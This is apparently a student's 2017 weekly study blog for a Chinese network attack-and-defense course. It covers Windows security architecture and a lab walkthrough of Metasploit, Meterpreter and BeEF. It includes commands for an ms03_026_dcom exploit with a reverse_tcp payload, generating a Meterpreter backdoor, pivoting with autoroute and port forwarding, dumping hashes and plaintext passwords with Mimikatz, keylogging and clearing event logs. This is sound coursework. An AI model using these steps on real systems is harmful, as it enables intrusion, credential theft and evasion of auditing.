20169203 2016-2017-2 《网络攻防实践》第七周学习总结

教材学习内容总结

第七章 Windows安全攻防
7.1 win基本框架

Windows操作系统内核的基本模块:Windows执行体、Windows内核体、设备驱动程序、硬件抽象层、Windows窗口与图形界面接口内核实现代码、系统支持进程、环境子系统服务进程、服务进程、用户应用软件、核心子系统DLL。Windows的虚拟内存空间分为系统核心内存区间和用户内存区间。在32位的Windows系统中,2GB4GB区间为系统核心内存,0GB2GB区间为用户态内存
Windows网络组件模块:

各种网卡硬件的设备驱动程序
NDIS库及miniport驱动程序
TDI传输层,也称为网络协议驱动
网络API DLL及TDI客户端
网络应用程序与服务进程
windows操作系统的基本结构分为运行于处理器特权模式的操作系统内核,以及运行在处理器非特权模式的用户空间代码。
windows操作系统内核的基本模块包括:Windows执行体,windows内核体、设备驱动程序、硬件抽象层、Windows窗口与图形界面接口内核实现代码、系统支持进程、环境子系统服务进程、服务进程、用户应用软件、核心子系统DLL、Windows进程和线程管理机制、windows内存管理机制、windows文件管理机制、windows注册表管理机制、windows的网络机制。
7.2 win安全体系

Windows操作系统的安全设计目标是采用一致的、健壮的、基于对象的安全模型
Windows操作系统基于引用监控器模型(RM)来实现基本的对象安全模型
引用监控器模型(RM)最为核心的是位于内核中的SRM安全引用监控器,以及位于用户态的LSASS安全服务

SD安全描述符主要由如下主要属性组成。
1.Owner SID:对象所有者的SID安全标识符。
2.Group SID:对象所在基本用户组的SID安全标识符。
3.DACL自主访问控制列表:指明了那些安全主体可以何种方式来访问该对象。
4.SACL 系统审计访问控制列表:指明了那些主体发起的那些访问操作需要被审计。
7.3 win远程安全攻防技术

Windows系统的安全漏洞生命周期:

Windows安全漏洞发现、利用与修补过程
安全漏洞公开披露信息库
针对特定目标的渗透测试攻击过程
使用Metasploit软件实施渗透测试
Windows远程口令猜测与破解攻击:

远程口令自猜测
远程口令字交换通信窃听与破解
远程口令猜测与破解防范措施
Windows网络服务远程渗透攻击:

针对NetBIOS网络服务的著名漏洞及攻击
针对SMB网络服务的著名漏洞及攻击
针对MSRPC网络服务的著名漏洞及攻击
针对Windows系统上微软网络服务的远程渗透攻击
针对Windows系统上第三方网络服务的远程渗透攻击
7.4 win本地安全攻防技术

Windows本地特权提升
Windows敏感信息窃取: Windows系统口令字密文提取技术、Windows系统口令字破解技术、用户敏感数据窃取、本地敏感信息窃取防范措施
Windows消踪灭迹: 关闭审计功能、清理事件日志

Windows远程安全攻防技术:远程口令猜测与破解攻击、攻破Windows网络服务、攻击Windows客户端及用户。
windows系统的安全漏洞生命周期:Windows安全漏洞发现、利用和修补过程。安全漏洞公开纰漏信息库、针对特定目标的渗透测试攻击过程、使用Metasploit软件实施渗透测试
使用Metasploit Console终端实施渗透测试过程。
1.use exploit/windows/dcerpc/ms03_026_dcom
2.set PLAYLOAD generic/shell——reverse_tcp
3.set LHOST 192.168.200.2;set RHOST 192.168.200.124.

教材学习中遇到的问题及解决办法

视频学习

漏洞利用之Metasploit基础


对于其中的各个模块介绍
Auxiliary:辅助模块
encoders:供msfencode编码工具使用,具体可以使用msfencode -l
exploits:攻击模块,每个介绍msf的文章都会提到那个ms08_067_netapi,它就在这个目录
payloads:这里面列出的是攻击载荷,也就是攻击成功之后执行的代码。比如常设置的windows/meterpreter/reverse_tcp就在这个文件夹下
post:后渗透阶段模块,在获得metasploit的shell之后可以使用的攻击代码。比如常用的hashdump、arp_scanner就在这里
发现漏洞,搜索exploit
首先对目标进行版本扫描

在刚刚打开的msf中搜索看Metasploit的ftp服务是否有漏洞

进入exploit,查看参数

配置好信息,之后输入命令exploit 进行攻击

kali漏洞利用之Meterpreter介绍

Meterpreter是metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpretershell的链接

Meterpreter作为后渗透模块有多种类型,并且命令由核心命令和扩展命令组成,极大地丰富了攻击方式。其有很多有用的功能,如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe.、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程机器的网络接口和IP地址等信息

常用的命令:background:将当前会话放置后台;load/use:加载模块;Interact:切换进一个信道;migrate:迁移进程;run:执行一个已有的模块,这里要说的是是输入run之后按两下tab键,会列出所有的已有的脚本,常用的有autoroute,hashdump,arp_scanner,multi_meter_inject等;Resource:执行一个已有的rc脚本常用的Meterpreter类型为:payload/windows/meterpreter/reverse_tcp
meterpreter 是metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出成功后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个meterpretershell.
meterpreter作为后渗透模块有多中类型,并且命令由核心命令和扩展库命令组成,极大地丰富了攻击方式,其有很多有用的功能,如,添加一个用户,隐藏一些东西,打开shell,得到用户密码,上传下载远程主机的文件,运行cmd.exe,捕获屏幕,得到远程控制权,捕获按键信息,清除应用程序,显示远程主机的系统信息,显示远程及其的网络接口和IP地址等信息。
常见的命令:

background:将当前会话放置后台
load/use:加载模块
interact:切换进一个信道
migrate:迁移进程
run:执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本。
resource:执行一个已有的rc脚本常用的meterpreter类型为:payload/windows/meterpreter/reverse_tcp。
攻击步骤:

生成Meterpreter后门
打开MSF,开启监听,选择exploit/multi/handler
在目标机器上执行door.exe
通过help命令查看可执行的命令
常见命令使用,包括系统信息,抓取屏幕截图与抓取HASH等。
目录浏览
键盘监听
扩展工具,load/use之后再输入help,就可以了看到有关这个模块的命令的说明了
扩展工具之Minikatz,抓取本地密码明文

漏洞利用之Metasploit后渗透测试

在跳板机获取一定权限后,需要积极地向内网主机权限发展,获取指定的目标信息,探查系统的漏洞,借助Msf已经得到的Meterpreter后门,可以使后续操作更容易。

查看当前网卡、网段信息
添加路由表 run autoroute -s 10.0.0.1
开Socks代理 通过使用 auxiliary/sever/socks4a模块,创建一个Socks代理,可以作为浏览器,Sqlmp,Namp等使用。
通过Background和sessions -i可以自由切换进入Session
输入run可以看到Meterpreter上可以做的很多命令
获取内网信息run arp_scanner -r 10.0.0.1/24
也可上传文件,做端口转发后续测试
应用程序/权限维持/Tunnel工具集
端口转发 upload lcx.exe c:

kali漏洞利用之BeeF

命令行下启动beef

此时浏览器自动访问此页面http://127.0.0.1:3000/ui/authentication

登陆到http://127.0.0.1:3000/demos/basic.html

这个测试的demo是在访问了之后,BeEF就会hock到信息。

HOCK持续的时间到关闭测试页面为止,在此期间,相当于被控制了,可以发送攻击命令,在Commends模块,可以完成很多任务:其中,4种颜色分别表示:绿色:该攻击模块可用,且隐蔽性强;灰色:该攻击模块可用,但隐蔽性差;橙色:该攻击模块是否可用还有待验证;红色:该攻击模块不可用
测试攻击

测试proxy

遇到的问题以及解决办法

在开启Metasploit服务时遇到问题如下:

查找资料应该是在最新的kali命令不支持
在kali 2.0中启动带数据库支持的MSF方式如下:
首先启动postgresql数据库:/etc/init.d/postgresql start;或者 service postgresql start;
初始化MSF数据库(关键步骤!):msfdb init;
运行msfconsole:msfconsole;
在msf中查看数据库连接状态:db_status。

错题分析

传输层的攻击都和TCP三次握手过程的设计缺陷有关。(false)传输层协议有TCP和UDP
中间人攻击可以破坏信息的机密性和完整性。(true)
入侵检测中最核心的任务是信息分析,下面的技术中对未知攻击无效的是(c)误用检测是针对已知攻击的特征库的。
A .异常检测
B .统计分析
C .误用检测
D .机器学习
netfilter/iptables的规则表中,可以进行源IP和端口转换的是?(c)
A .filter表
B .trans表
C .nat表
D .mangle表

参考资料

《网络攻防技术与实践》 诸葛建伟著
网络攻防视频

学习进度条

按照作业来,按时完成作业。

posted @ 2017-04-12 14:05  李学生  阅读(197)  评论(1编辑  收藏  举报